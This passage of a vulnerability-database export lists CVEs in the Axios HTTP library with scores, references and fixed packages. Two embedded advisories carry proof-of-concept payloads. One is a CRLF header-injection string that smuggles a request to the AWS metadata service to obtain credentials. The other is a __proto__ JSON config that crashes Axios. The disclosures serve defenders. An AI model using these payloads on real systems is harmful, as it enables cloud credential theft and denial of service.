reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
reference_id 2456913
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
16
reference_url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
reference_id GHSA-3p68-rc4w-qgx5
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
17
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
18
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
19
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
20
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
21
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
fixed_packages
0
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
aliases CVE-2025-62718, GHSA-3p68-rc4w-qgx5
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axk7-6q4b-vuga
2
url VCID-ek49-tuj4-t3ap
vulnerability_id VCID-ek49-tuj4-t3ap
summary 
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

## Summary
The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).

While Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.

**Severity**: Critical (CVSS 9.9)
**Affected Versions**: All versions (v0.x - v1.x)
**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)

## Usage of "Helper" Vulnerabilities
This vulnerability is unique because it requires **Zero Direct User Input**.
If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.

Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload.

## Proof of Concept

### 1. The Setup (Simulated Pollution)
Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:
```javascript
Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";
```

### 2. The Gadget Trigger (Safe Code)
The application makes a completely safe, hardcoded request:
```javascript
// This looks safe to the developer
await axios.get('https://analytics.internal/pings'); 
```

### 3. The Execution
Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.

**Resulting HTTP traffic:**
```http
GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...
```

### 4. The Impact (IMDSv2 Bypass)
The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).
The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

## Impact Analysis
-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).
-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.
-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.

## Recommended Fix
Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.

**Patch Suggestion:**
```javascript
// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});
```

## References
-   **OWASP**: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.13652
published_at 2026-04-21T12:55:00Z
1
value 0.00136
scoring_system epss
scoring_elements 0.33357
published_at 2026-04-18T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.46982
published_at 2026-04-11T12:55:00Z
3
value 0.00239
scoring_system epss
scoring_elements 0.46962
published_at 2026-04-13T12:55:00Z
4
value 0.00239
scoring_system epss
scoring_elements 0.46955
published_at 2026-04-12T12:55:00Z
5
value 0.0053
scoring_system epss
scoring_elements 0.67279
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
5
reference_url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
6
reference_url https://github.com/axios/axios/pull/10660
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10660
7
reference_url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
8
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10688
9
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
10
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
4
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
8
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id 2457432
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
14
reference_url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
reference_id GHSA-fvcv-3m26-pcqx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
15
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
16
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
17
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
18
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
19
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
20
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
21
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
22
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
fixed_packages
0
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
aliases CVE-2026-40175, GHSA-fvcv-3m26-pcqx
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap
3
url VCID-kgnf-z6ca-tqgp
vulnerability_id VCID-kgnf-z6ca-tqgp
summary Axios HTTP/2 Session Cleanup State Corruption Vulnerability
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-39865
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01675
published_at 2026-04-13T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01685
published_at 2026-04-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.017
published_at 2026-04-09T12:55:00Z
3
value 0.00016
scoring_system epss
scoring_elements 0.03412
published_at 2026-04-16T12:55:00Z
4
value 0.00016
scoring_system epss
scoring_elements 0.03542
published_at 2026-04-21T12:55:00Z
5
value 0.00016
scoring_system epss
scoring_elements 0.03423
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-39865
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/releases/tag/v1.13.2
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.13.2
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2456538
reference_id 2456538
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2456538
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-39865
reference_id CVE-2026-39865
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-39865
7
reference_url https://github.com/advisories/GHSA-qj83-cq47-w5f8
reference_id GHSA-qj83-cq47-w5f8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qj83-cq47-w5f8
8
reference_url https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8
reference_id GHSA-qj83-cq47-w5f8
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/
url https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8
fixed_packages
0
url pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
purl pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1
1
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
aliases CVE-2026-39865, GHSA-qj83-cq47-w5f8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kgnf-z6ca-tqgp
4
url VCID-x41s-g5mh-pkdq
vulnerability_id VCID-x41s-g5mh-pkdq
summary 
Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
# Denial of Service via **proto** Key in mergeConfig

### Summary

The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.

### Details

The vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:

```javascript
utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});
```

When `prop` is `'__proto__'`:

1. `JSON.parse('{"__proto__": {...}}')` creates an object with `__proto__` as an own enumerable property
2. `Object.keys()` includes `'__proto__'` in the iteration
3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)
4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`
5. `Object.prototype(...)` throws `TypeError: merge is not a function`

The `mergeConfig` function is called by:

- `Axios._request()` at `lib/core/Axios.js:75`
- `Axios.getUri()` at `lib/core/Axios.js:201`
- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`

### PoC

```javascript
import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);
```

**Reproduction steps:**

1. Clone axios repository or `npm install axios`
2. Create file `poc.mjs` with the code above
3. Run: `node poc.mjs`
4. Observe the TypeError crash

**Verified output (axios 1.13.4):**

```
TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)
```

**Control tests performed:**
| Test | Config | Result |
|------|--------|--------|
| Normal config | `{"timeout": 5000}` | SUCCESS |
| Malicious config | `JSON.parse('{"__proto__": {"x": 1}}')` | **CRASH** |
| Nested object | `{"headers": {"X-Test": "value"}}` | SUCCESS |

**Attack scenario:**
An application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{"__proto__": {"x": 1}}`.

### Impact

**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

- Node.js servers using axios for HTTP requests
- Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.1578
published_at 2026-04-21T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.15744
published_at 2026-04-16T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.1582
published_at 2026-04-13T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.15889
published_at 2026-04-12T12:55:00Z
4
value 0.00051
scoring_system epss
scoring_elements 0.15927
published_at 2026-04-11T12:55:00Z
5
value 0.00051
scoring_system epss
scoring_elements 0.1595
published_at 2026-04-09T12:55:00Z
6
value 0.00051
scoring_system epss
scoring_elements 0.15802
published_at 2026-04-07T12:55:00Z
7
value 0.00051
scoring_system epss
scoring_elements 0.16003
published_at 2026-04-04T12:55:00Z
8
value 0.00051
scoring_system epss
scoring_elements 0.1594
published_at 2026-04-02T12:55:00Z
9
value 0.00051
scoring_system epss
scoring_elements 0.15888
published_at 2026-04-08T12:55:00Z
10
value 0.00053
scoring_system epss
scoring_elements 0.16649
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
5
reference_url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
6
reference_url https://github.com/axios/axios/pull/7369
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7369
7
reference_url https://github.com/axios/axios/pull/7388
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7388
8
reference_url https://github.com/axios/axios/releases/tag/v0.30.0
reference_id
reference_type
scores
url https://github.com/axios/axios/releases/tag/v0.30.0
9
reference_url https://github.com/axios/axios/releases/tag/v0.30.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v0.30.3
10
reference_url https://github.com/axios/axios/releases/tag/v1.13.5
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v1.13.5
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
reference_id 1127907
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
reference_id 2438237
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
15
reference_url https://github.com/advisories/GHSA-43fc-jf86-j433
